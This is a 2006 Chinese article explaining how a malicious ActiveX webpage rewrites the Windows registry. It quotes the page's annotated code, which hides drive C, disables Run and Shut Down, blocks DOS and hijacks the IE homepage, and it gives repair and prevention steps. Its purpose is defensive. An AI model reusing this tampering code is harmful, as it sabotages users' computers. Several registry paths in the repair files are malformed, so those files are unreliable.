分享
 
 
 

浏览网页注册表被修改之迷及解决办法

王朝html/css/js·作者佚名  2006-11-24
窄屏简体版  字體: |||超大  

浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页http://www.某某.com/default.htm ,你真有生不如死的感觉!

进入该网页会被:

1.修改开始菜单

1)禁止“关闭系统”

2)禁止“运行”

3)禁止“注销”

2.隐藏C盘——你的C盘找不到了

3.禁止使用注册表编辑器regedit

4.禁止使用DOS程序

5.使系统无法进入“实模式”

6.禁止运行任何程序

7.将IE浏览器的首页改为http://www.某某.com/,收藏夹中也被加入该网址。

那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

注:下面代码是将你的IE默认连接首页改为http://www.某某.com/

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Start Page", "http://www.某某.com/");

注:以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion

\Policies\Explorer\NoRun", 01, "REG_BINARY");

注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY");

注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");

注:使受害者系统没有“注销”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");

注:使受害者系统没有逻辑驱动器C

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY");

注:禁止运行所有的DOS应用程序;

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");

注:使系统不能启动到“实模式”(传统的DOS模式)下;

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "呜啦啦...");

注:这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");

注:上面一行是会在窗口中显示出来的文字

注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦...");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦...");

注:到上面一行为止,完成了对受害者的注册表的所有修改!

注:下面代码用来将其网页增加到受害者的收藏夹中

var WF, Shor, loc;

WF = FSO.GetSpecialFolder(0);

loc = WF + "\Favorites";

if(!FSO.FolderExists(loc))

{

loc = FSO.GetDriveName(WF) + "\Documents and Settings\" + Net.UserName + "\Favorites";

if(!FSO.FolderExists(loc))

{

return;

}

}

注:下面就是使其网页加入到你的收藏夹的具体代码

AddFavLnk(loc, "找到感觉www.某某.com", "http://www.某某.com");

由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。

受害用户的修复方法:

1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。

2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。

unlock.reg文件内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\Explorer]

"NoDriveTypeAutoRun"=dword:00000095

"NoRun"=hex:

"NoLogOff"=hex:

"NoDrives"=dword:00000000

"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]

"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]

"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]

"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]

"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionWinlogon]

"LegalNoticeCaption"=""

"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]

"Window Title"="IE浏览器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Window Title"="IE浏览器"

预防办法:

1.要避免中招,关键是不要轻易去一些自己并不了解的站点。

2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止

3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。

4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!

加锁方法如下:

(1)运行注册表编辑器regedit.exe;

(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。

解锁方法如下:

用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]

"DisableRegistryTools"=dword:00000000

存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!

说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有